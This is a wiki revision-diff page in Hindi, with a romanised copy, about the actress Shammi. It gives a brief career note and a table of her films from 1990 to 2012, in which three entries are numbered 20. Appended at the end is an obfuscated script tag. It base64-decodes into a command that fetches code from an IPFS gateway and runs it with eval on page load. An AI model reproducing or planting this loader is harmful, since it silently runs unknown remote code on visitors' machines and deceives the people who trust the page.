Difference between revisions of "शम्मी की प्रमुख फ़िल्में"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{शम्मी विषय सूची}} {{सूचना बक्सा कलाकार |चित्र=Shammi.jpg |चि...' के साथ नया पृष्ठ बनाया)
 
Line 33: Line 33:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
शम्मी ने अपने कॅरियर को न तो कभी प्लान किया और न ही बहुत ज़्यादा महत्वाकांक्षाएं पालीं। बस जो भी काम उन्हें मिलता रहा, बिना ना-नुकुर किए करती चली गयी। यही वजह है कि जल्द ही उनकी पहचान महज़ एक चरित्र अभिनेत्री के रूप में ही रह गयी। नायिका के तौर पर भले ही वो ज़्यादा काम नहीं कर पायी लेकिन चरित्र अभिनेत्री बनने का उन्हें ये फ़ायदा हुआ कि उन्हें बिना काम के कभी बैठना नहीं पड़ा।
+
शम्मी ने अपने कॅरियर को न तो कभी प्लान किया और न ही बहुत ज़्यादा महत्वाकांक्षाएं पालीं। बस जो भी काम उन्हें मिलता रहा, बिना ना-नुकुर किए करती चली गयीं। यही वजह है कि जल्द ही उनकी पहचान महज़ एक चरित्र अभिनेत्री के रूप में ही रह गयीं। नायिका के तौर पर भले ही वो ज़्यादा काम नहीं कर पायी लेकिन चरित्र अभिनेत्री बनने का उन्हें ये फ़ायदा हुआ कि उन्हें बिना काम के कभी बैठना नहीं पड़ा।
 
==मुख्य फ़िल्म==
 
==मुख्य फ़िल्म==
1950 के दशक में शम्मी आंटी ने ‘बाग़ी’, ‘आग का दरिया’, ‘मुन्ना’, ‘रुखसाना’, ‘पहली झलक’, ‘लगन’, ‘बंदिश’, 'मुसाफ़िरखाना', ‘आज़ाद’ और 'दिल अपना और प्रीत परायी' जैसी कई फ़िल्मों में महत्वपूर्ण भूमिकाएं निभायीं। अब तक की उनकी अन्तिम फ़िल्म ‘शिरीन फ़रहाद की तो निकल पड़ी’ है जो साल [[2012]] में प्रदर्शित हुई थी।
+
[[1950]] के दशक में शम्मी आंटी ने ‘बाग़ी’, ‘आग का दरिया’, ‘मुन्ना’, ‘रुखसाना’, ‘पहली झलक’, ‘लगन’, ‘बंदिश’, 'मुसाफ़िरखाना', ‘आज़ाद’ और 'दिल अपना और प्रीत परायी' जैसी कई फ़िल्मों में महत्वपूर्ण भूमिकाएं निभायीं। अब तक की उनकी अन्तिम फ़िल्म ‘शिरीन फ़रहाद की तो निकल पड़ी’ है जो साल [[2012]] में प्रदर्शित हुई थी।
 +
{| width="30%" class="bharattable-pink"
 +
|-
 +
! क्र. सं.
 +
! फ़िल्म
 +
! वर्ष
 +
|-
 +
| 1
 +
| शिरीन फरहद की तो निकल पड़ी
 +
| [[2012]]
 +
|-
 +
| 2
 +
| खाप
 +
| [[2011]]
 +
|-
 +
| 3
 +
| सुखमनी
 +
| [[2010]]
 +
|-
 +
| 4
 +
| खुशबू
 +
| 2008
 +
|-
 +
| 5
 +
| चलता है यार
 +
| [[2005]]
 +
|-
 +
| 6
 +
| क्या दिल ने कहा
 +
| [[2002]]
 +
|-
 +
| 7
 +
| ये रास्ते है प्यार
 +
| [[2001]]
 +
|-
 +
| 8
 +
| हम हो गये आपके
 +
| 2001
 +
|-
 +
| 9
 +
| तेरा जादू चल गया
 +
| [[2000]]
 +
|-
 +
| 10
 +
| कुँवारा
 +
| 2000
 +
|-
 +
| 11
 +
| हम साथ साथ है
 +
| [[1999]]
 +
|-
 +
| 12
 +
| और प्यार हो गया
 +
| [[1997]]
 +
|-
 +
| 13
 +
| मि. बेचारा
 +
| [[1996]]
 +
|-
 +
| 14
 +
| रंगीला
 +
| [[1995]]
 +
|-
 +
| 15
 +
| कुली न. वन
 +
| 1995
 +
|-
 +
| 16
 +
| झुमका
 +
| 1995
 +
|-
 +
| 17
 +
| चीताह
 +
| [[1994]]
 +
|-
 +
| 18
 +
| गोपी किशन
 +
| 1994
 +
|-
 +
| 19
 +
| परमात्मा
 +
| 1994
 +
|-
 +
| 20
 +
| घर की इज्जत
 +
| 1994
 +
|-
 +
| 20
 +
| दिल
 +
| [[1990]]
 +
|-
 +
| 20
 +
| स्वर्ग
 +
| 1990
 +
|}
 +
 
 +
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{शम्मी विषय सूची}}
 
{{शम्मी विषय सूची}}

Revision as of 10:31, 15 June 2017

shammi vishay soochi
shammi ki pramukh filmean
poora nam naragis raba di (vastavik nam)
prasiddh nam shammi aanti
janm 24 aprail, 1929
janm bhoomi gujarat
pati/patni sultan ahamad
karm bhoomi abhinetri
karm-kshetr mumbee
mukhy filmean ‘bagi’, ‘ag ka dariya’, ‘munna’, ‘rukhasana’, ‘pahali jhalak’, ‘lagan’, ‘bandish’, 'musafirakhana', ‘azad’ aur 'dil apana aur prit parayi'
prasiddhi abhinetri
nagarikata bharatiy
any janakari shammi ka jivan ko lekar nazariya poori tarah se spasht hai. vo kahati haian, maianne jiandagi ko hamesha apani shartoan par jiya aur jo kuchh paya, use eeshvar ka prasad samajha hai. maian khush hooan ki mujhe logoan ka bharapoor pyar aur iqabal jaisa qabil beta mila. apane jivan se maian poori tarah se santusht hooan.

shammi ne apane kॅriyar ko n to kabhi plan kiya aur n hi bahut zyada mahatvakaankshaean palian. bas jo bhi kam unhean milata raha, bina na-nukur kie karati chali gayian. yahi vajah hai ki jald hi unaki pahachan mahaz ek charitr abhinetri ke roop mean hi rah gayian. nayika ke taur par bhale hi vo zyada kam nahian kar payi lekin charitr abhinetri banane ka unhean ye fayada hua ki unhean bina kam ke kabhi baithana nahian p da.

mukhy film

1950 ke dashak mean shammi aanti ne ‘bagi’, ‘ag ka dariya’, ‘munna’, ‘rukhasana’, ‘pahali jhalak’, ‘lagan’, ‘bandish’, 'musafirakhana', ‘azad’ aur 'dil apana aur prit parayi' jaisi kee filmoan mean mahatvapoorn bhoomikaean nibhayian. ab tak ki unaki antim film ‘shirin farahad ki to nikal p di’ hai jo sal 2012 mean pradarshit huee thi.

kr. san. film varsh
1 shirin pharahad ki to nikal p di 2012
2 khap 2011
3 sukhamani 2010
4 khushaboo 2008
5 chalata hai yar 2005
6 kya dil ne kaha 2002
7 ye raste hai pyar 2001
8 ham ho gaye apake 2001
9 tera jadoo chal gaya 2000
10 kuanvara 2000
11 ham sath sath hai 1999
12 aur pyar ho gaya 1997
13 mi. bechara 1996
14 rangila 1995
15 kuli n. van 1995
16 jhumaka 1995
17 chitah 1994
18 gopi kishan 1994
19 paramatma 1994
20 ghar ki ijjat 1994
20 dil 1990
20 svarg 1990


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh
shammi vishay soochi

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>